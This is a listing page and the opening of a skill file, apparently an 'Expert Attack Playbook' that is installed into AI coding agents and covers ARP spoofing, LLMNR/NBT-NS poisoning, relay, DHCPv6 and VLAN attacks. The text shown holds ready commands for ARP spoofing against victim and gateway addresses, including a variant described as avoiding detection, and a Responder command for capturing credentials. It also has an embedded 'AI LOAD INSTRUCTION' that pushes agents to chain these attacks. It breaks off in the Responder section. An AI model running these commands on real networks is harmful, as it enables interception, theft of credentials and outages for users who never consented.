## What it does

The skill covers layer 2 and layer 3 protocol exploitation. Inside are ready commands for `arpspoof`, `ettercap`, `bettercap`, `responder`, `mitm6`, `ntlmrelayx.py`, `yersinia` and the THC-IPv6 suite. Separate sections handle credential capture through name resolution poisoning, WPAD interception, DHCPv6 takeover and IDS/IPS evasion.

It also routes you onward: `tunneling-and-pivoting` once you hold a MitM position, `ntlm-relay-coercion` for relaying captured hashes, `traffic-analysis-pcap` for reading the traffic you grabbed. Hash formats come with hashcat modes, and the relay section spells out the conditions each attack needs.

This is offensive tooling, not a configuration audit. Several techniques die against hardening: SMB signing and LDAP signing kill the relay, BPDU Guard and `switchport nonegotiate` close off STP and DTP. ARP spoofing and DHCPv6 poisoning take the network down for real users, so get written authorization before you run any of it.

## Install

### Claude Code (native platform)

1. **Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill network-protocol-attacks -a claude-code
```

2. **Manually: put the files in place**
- File: `~/.claude/skills/network-protocol-attacks/SKILL.md` — Copy the whole skill folder; for one project use .claude/skills/network-protocol-attacks/

### Codex

1. **Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill network-protocol-attacks -a codex
```

2. **Manually: put the files in place**
- File: `.agents/skills/network-protocol-attacks/SKILL.md` — For all projects use ~/.agents/skills/

### Cursor

1. **Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill network-protocol-attacks -a cursor
```

2. **Manually: put the files in place**
- File: `.cursor/skills/network-protocol-attacks/SKILL.md` — Cursor also reads .agents/skills/ and .claude/skills/

### GitHub Copilot

1. **GitHub CLI**
```bash
gh skill install yaklang/hack-skills network-protocol-attacks
```

2. **Manually: put the files in place**
- File: `.github/skills/network-protocol-attacks/SKILL.md`

### Gemini CLI

1. **Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill network-protocol-attacks -a gemini-cli
```

2. **Platform CLI**
```bash
gemini skills install https://github.com/yaklang/hack-skills --path skills/network-protocol-attacks
```

### Windsurf (Devin Desktop)

**Manually: put the files in place**
- File: `.devin/skills/network-protocol-attacks/SKILL.md` — The legacy .windsurf/skills/ path still works

### OpenCode

**Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill network-protocol-attacks -a opencode
```

### Claude.ai

**Claude.ai**
- Zip the folder and upload it in Settings → Capabilities → Skills

Where a file is given instead of a command, copy the files from the source to that path: https://github.com/yaklang/hack-skills/tree/HEAD/skills/network-protocol-attacks/SKILL.md

## When to use it
- intercept traffic between a victim and the gateway with ARP spoofing
- harvest NTLM hashes by poisoning LLMNR, NBT-NS and mDNS
- stand up DHCPv6 and redirect Windows DNS queries
- cross into another VLAN via DTP or 802.1Q double tagging
- claim the STP root bridge and pull traffic through your host

## Example prompts
- walk me through ARP spoofing with bettercap against 10.0.0.50
- how do I configure responder to capture NTLM hashes on this segment
- explain the mitm6 and ntlmrelayx chain for relaying to LDAP

# SKILL: Network Protocol Attacks — Expert Attack Playbook

> **AI LOAD INSTRUCTION**: Expert network protocol attack techniques. Covers ARP spoofing, name resolution poisoning (LLMNR/NBT-NS/mDNS), WPAD abuse, DHCPv6 takeover, VLAN hopping, STP manipulation, DNS spoofing, IPv6 attacks, and IDS/IPS evasion. Base models miss the chaining opportunities between these attacks and the nuances of modern switched network exploitation.

## 1. ARP SPOOFING

### Gratuitous ARP — MitM Positioning

```bash
# arpspoof (dsniff suite)
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t VICTIM_IP GATEWAY_IP &
arpspoof -i eth0 -t GATEWAY_IP VICTIM_IP &
# ettercap — ARP poisoning with sniffing
ettercap -T -q -i eth0 -M arp:remote /VICTIM_IP// /GATEWAY_IP//
# bettercap — modern framework
bettercap -iface eth0
> set arp.spoof.targets VICTIM_IP
> arp.spoof on
> net.sniff on
```

### Selective Targeting

```bash
# bettercap — target specific hosts, avoid detection
> set arp.spoof.targets 10.0.0.50,10.0.0.51
> set arp.spoof.fullduplex true
> set arp.spoof.internal true
> arp.spoof on
```

### Detection Indicators

- Duplicate MAC addresses in ARP table
- Gratuitous ARP storms from non-gateway IPs
- Tools: `arpwatch`, static ARP entries, 802.1X port authentication

---

## 2. LLMNR / NBT-NS / mDNS POISONING

### Responder — Credential Capture

```bash
# Basic poisoning (LLMNR + NBT-NS + mDNS)
responder -I eth0 -dwPv
# Key flags:
